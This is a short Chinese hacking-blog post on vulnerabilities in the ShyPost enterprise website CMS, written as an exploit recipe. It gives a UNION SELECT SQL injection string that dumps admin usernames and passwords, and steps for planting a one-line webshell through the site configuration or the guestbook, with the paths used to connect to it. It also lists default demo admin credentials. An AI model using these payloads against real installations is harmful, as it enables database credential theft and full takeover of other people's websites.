当前位置: iick's blog > 网站漏洞 > shypostShyPost企业网站管理系统漏洞

shypostShyPost企业网站管理系统漏洞

作者:hack1990 时间:12-03-04 阅读数:574人阅读

ShyPost企业管理系统拥有十几种模板,用户可自由选择,不同模板后台管理功能是一样的,以下  为其中一个模板的前后台测试,欢迎用户测试。

  后台演示: http://www.shypost.com/demo/admin
  测试帐号: admin 密码 admin
  前台演示: http://www.shypost.com/demo
  销售价格:350元/套


1、注入:
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin

拿shell:
网站配置中插入:
连接 http://yoursite.com/inc/config.asp


2、写马:
留言本写入一句话,连接http://yoursite.com/databases/databases.asp

3、其它若干问题

test:
http://www.shypost.com/demo/test.htm

 

by Mr.DzY
 

# Nmap Security Scanner 7.0

上一篇:围观:17岁少女揭秘淘宝内幕 (漏洞解析) 黑客少女揭秘2000万美金0day

下一篇:aspcms EXP 批量型

相关文章

发表评论